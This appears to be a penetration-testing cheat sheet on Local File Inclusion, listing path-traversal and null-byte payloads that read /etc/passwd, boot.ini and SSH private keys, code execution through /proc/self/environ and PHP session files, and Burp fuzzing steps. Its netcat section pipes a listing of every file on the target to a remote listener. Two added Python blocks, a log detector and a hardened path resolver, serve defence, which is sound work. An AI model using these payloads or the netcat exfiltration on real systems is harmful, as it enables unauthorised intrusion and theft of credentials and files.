# Local File Inclusion (LFI)

## Local File Inclusion

* If a parameter value looks like a file or folder path.. you might have an LFI
* Keep trying traversal combinations until one works.
* Or google/searchsploit for a known LFI in the product
* REF: [PhpTricks](https://pentest.mxhx.org/04-webapps/php-tricks), [WebInjections](https://pentest.mxhx.org/04-webapps/03-webapp), [PFSenseRemoteExec](https://pentest.mxhx.org/pfsense#exec-code-exploit), [CharEvasion](https://pentest.mxhx.org/03-getting-in/char-evasion-tricks)

```
LFI Likely:
http://$IP/dept/manage.php?notes=files/nineveh.txt

Testing:
http://$IP/dept/manage.php?notes=files/../../../../etc/passwd
http://$IP/dept/manage.php?notes=files/../../../../../../../etc/passwd
http://$IP/dept/manage.php?notes=/myNotes/../../../etc/passwd
```

## Automation

* Automate LFI enumeration/discovery.
* Good to add to the tool-belt when you want to see which sensitive files exist and are readable once you've found an LFI vulnerability. It also includes a mode (ICE-Breaker) that scans a potential target with an encoded path-traversal list, which helps in LFI discovery.
* <https://www.reddit.com/r/oscp/comments/9fxhbp/helpful_local_file_inclusion_tool_fi/>

```
nikto ..might give you one (if known)
python fi-cyberscan.py -t http://$IP/cyber.php?page= -m1
fimap -u $IP  ..in kali
```

## Whoami / Home / SSH

```
whoami:
/proc/self/status  ..match the Uid/Gid (e.g. 100:101) against /etc/passwd

Home directory:
/etc/passwd                    ..learn home path
/var/lib/asterisk/             ..check home path
/var/lib/asterisk/.ssh/id_rsa  ..priv ssh key here?
```

## Code exec with 'environ'

* If you can read /proc/self/environ, you might have code execution (request headers such as User-Agent end up in it)
* Burp > Repeater > /proc/self/environ

```
graph.php?lang=../../../proc/self/environ%00&module=Accounts
User-Agent: <?php echo "hello"; ?>
Go
```

## Fuzzing LFI

* Burp > Intercept > Send to **Intruder** > Positions
* Clear & Add: $attack$
* <https://github.com/tennc/fuzzdb/tree/master/dict/BURP-PayLoad/LFI>
* REF: [Fuzzing](https://pentest.mxhx.org/02-scanning/fuzzing)

```
graph.php?lang=../../../etc/passwd%00&module=Accounts
graph.php?lang=../../../$attack$%00&module=Accounts
                           |
                         Keyword for fuzz

Payloads > Load > burp-fuzz > 
LFI-LogFileCheck.txt
LFI-InterestingFiles.txt

Start Attack
Sort by Length ..to see results
```
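The Intruder run above produces a burst of traversal requests from one client, which is exactly the pattern a defender can pick out of web-server logs. The following detector is an added example, not part of the original page or of any tool it references: it parses Apache-style access-log lines (the five sample lines are constructed to mirror the probes on this page, not real traffic), URL-decodes each request path repeatedly so double encoding is not missed, and flags null bytes, `../` hops and the sensitive files this page names (`/etc/passwd`, `/proc/self/environ`, `/proc/self/status`, `boot.ini`, `/tmp/sess_`, `.ssh/id_rsa`). The `SENSITIVE` pattern and the log format are assumptions; extend both for your environment.

```python
import re
from collections import Counter
from typing import Dict, List
from urllib.parse import unquote

# Constructed Apache-style access-log lines modelled on the probes listed on
# this page (not real traffic). The fourth line is double URL-encoded.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /dept/manage.php?notes=files/nineveh.txt HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /dept/manage.php?notes=files/../../../../etc/passwd HTTP/1.1" 200 1893
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /graph.php?lang=../../../proc/self/environ%00&module=Accounts HTTP/1.1" 200 2201
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /graph.php?lang=..%252f..%252fetc/passwd&module=Accounts HTTP/1.1" 404 221
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /images/photo.jpg HTTP/1.1" 200 40211
"""

# Assumed log layout: combined-log style, shortened to the fields we need.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
TRAVERSAL = re.compile(r"\.\.[/\\]")
# Files this page names as LFI targets; extend with your own list.
SENSITIVE = re.compile(
    r"/etc/passwd|/proc/self/(?:environ|status)|boot\.ini|/tmp/sess_|\.ssh/id_rsa", re.I
)


def decode_fully(s: str, max_rounds: int = 3) -> str:
    """URL-decode repeatedly so double encoding (..%252f) is not missed."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def analyse_line(line: str) -> Dict:
    """Parse one log line; return {} for lines that do not match the layout."""
    m = LOG_RE.match(line)
    if not m:
        return {}
    decoded = decode_fully(m.group("path"))
    reasons: List[str] = []
    if "\x00" in decoded:
        reasons.append("null byte")
    if TRAVERSAL.search(decoded):
        reasons.append("path traversal")
    if SENSITIVE.search(decoded):
        reasons.append("sensitive file")
    return {"ip": m.group("ip"), "status": int(m.group("status")),
            "path": decoded, "reasons": reasons}


def scan(log_text: str) -> List[Dict]:
    """Return one finding per request that shows at least one LFI indicator."""
    findings = []
    for line in log_text.splitlines():
        hit = analyse_line(line)
        if hit and hit["reasons"]:
            findings.append(hit)
    return findings


def probes_per_source(findings: List[Dict]) -> Dict[str, int]:
    """Count flagged requests per client; a burst from one IP is the fuzzing pattern."""
    return dict(Counter(f["ip"] for f in findings))


if __name__ == "__main__":
    results = scan(SAMPLE_LOG)
    for f in results:
        print(f"{f['ip']} {f['status']} {f['path']!r} <- {', '.join(f['reasons'])}")
    print(probes_per_source(results))
```

A 200 on a flagged request (the `/etc/passwd` and `/proc/self/environ` lines here) is the one to escalate first; a 404 still counts as a probe and feeds the per-source count.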

## RFI from LFI (php cookies)

* If you can locate the PHP 'session' file on disk
* You may be able to include it via **Burp Repeater** to get execution

```
cd vtiger/  ..if you have the source
grep -R phpinfo\(\)  
maybe: Image/Canvas/PDF.php  ..if we can access?
Find where session is saved:
ex: /tmp/sess_xyz123

Repeater:
graph.php?lang=../../../tmp/sess_xyz123%00&module=Accounts
Might give you execution
```

## Directory Traversals

```
--------------------
--------------------
/images/./photo.jpg             .. ok
/images/../photo.jpg            .. error
/images/../images/photo.jpg     .. win!

http://abc.so/images/../photo.png                              ..ok
http://abc.so/images/../../../../../photo.png                  ..ok
http://abc.so/../../../../../../../../../../secret.key         ..nothing

http://abc.so/file.php?file=photo.png
http://abc.so/file.php?file=./photo.png                  .. added ./
http://abc.so/file.php?file=./file.php                   .. 'real' file.php
http://abc.so/file.php?file=./../../../../../etc/passwd  .. worked !!
http://abc.so/file.php?file=./../../../../../boot.ini    .. windows target !!


--------------------
--------------------
Filtered: Can't leave /var/www/ 

http://abc.so/
http://abc.so/file.php?file=/var/www/photo.png                           ..ok
http://abc.so/file.php?file=/secret.key                                  ..fail
http://abc.so/file.php?file=./../../../../../../../../photo.png          ..fail
http://abc.so/file.php?file=/var/www/file.php                            ..ok
http://abc.so/file.php?file=/var/www/../../../../../../../../etc/passwd  ..ok
```

## NULL BYTE

* %00 ..URL-encoded NULL byte
* Adding a NULL byte truncates the path, dropping the suffix the server appends (on older systems)
* Works in Perl and older versions of PHP (fixed in PHP 5.3.4)
* Scenario: server appends .png automatically to your page parameter

```
http://abc.so/file.php?file=photo                 .. ok
http://abc.so/file.php?file=photo.png             .. nothing
http://abc.so/file.php?file=photo.png%00          .. ok
http://abc.so/file.php?file=file.php%00           .. ok
http://abc.so/file.php?file=/../../etc/passwd%00  .. win
```
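The Directory Traversals section shows a prefix filter ("can't leave /var/www/") beaten by `/var/www/../../etc/passwd`, and this section shows `%00` dropping an appended suffix. The following is an added example (not code from this page or from any of the referenced tools) that puts the weak check beside a hardened resolver, with `/var/www` and the `.png` suffix taken from the scenarios on the page. It uses `posixpath` so the lexical containment check behaves the same on any platform; on a live system you would resolve with `os.path.realpath` as well so symlinks cannot point out of the root.

```python
import posixpath
from typing import Dict, Optional, Tuple
from urllib.parse import unquote

# Values from the page's scenarios: requests must stay under /var/www and the
# server appends .png to whatever the client sent.
BASE_DIR = "/var/www"
SUFFIX = ".png"


def naive_prefix_check(requested: str) -> bool:
    """The weak filter behind "Can't leave /var/www/": a string-prefix test.
    '/var/www/../../../../etc/passwd' passes because the *string* starts with
    /var/www/, which is exactly the bypass shown on the page."""
    return requested.startswith(BASE_DIR + "/")


def resolve_safely(requested: str) -> Optional[str]:
    """Hardened resolver: returns the canonical path to serve, or None.

    Order of checks: URL-decode once; reject an embedded NUL (%00 trick);
    reject absolute paths and any '.' or '..' component; append the suffix,
    normalise, and confirm the result is still inside BASE_DIR.
    """
    decoded = unquote(requested)
    if "\x00" in decoded:                      # %00 truncation trick
        return None
    parts = decoded.replace("\\", "/").split("/")
    if parts[0] == "" or any(p in (".", "..") for p in parts):
        return None                            # absolute path or traversal hop
    candidate = posixpath.normpath(posixpath.join(BASE_DIR, decoded + SUFFIX))
    if posixpath.commonpath([BASE_DIR, candidate]) != BASE_DIR:
        return None                            # defence in depth: still under root?
    return candidate


# The page's own sample inputs (suffix omitted, as the server adds it).
PAGE_REQUESTS = [
    "photo",
    "images/photo",
    "photo.png%00",
    "./../../../../../etc/passwd",
    "/var/www/../../../../../../../../etc/passwd",
    "..%2f..%2fetc/passwd",
]


def audit(requests=PAGE_REQUESTS) -> Dict[str, Tuple[bool, Optional[str]]]:
    """Side by side: (naive check verdict, hardened resolver result)."""
    return {r: (naive_prefix_check(unquote(r)), resolve_safely(r)) for r in requests}


if __name__ == "__main__":
    for req, (naive_ok, safe_path) in audit().items():
        print(f"{req:48} naive={'pass' if naive_ok else 'fail':4} safe={safe_path}")
```

The hardened resolver deliberately accepts only relative names without dot components, so even the page's legitimate-looking `/var/www/photo.png` request is refused; the intent is an allowlist of what the application itself constructs, not a blocklist of what attackers send.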

## Netcat Tricks

* Find all files on the host.. send the listing to your remote listener
* REF: [ReverseShell](https://pentest.mxhx.org/03-getting-in/03-reverseshell-php#nc), [CharEvasion](https://pentest.mxhx.org/03-getting-in/char-evasion-tricks), [LFI](https://pentest.mxhx.org/04-webapps/lfi)

```
target: 
echo+abc+|nc+10.x.x.x:9000    ..test
find+/+|nc+10.x.x.x:9000      ..pull all files

kali:
nc -nvlp 9000 > findall.txt   ..receive
```
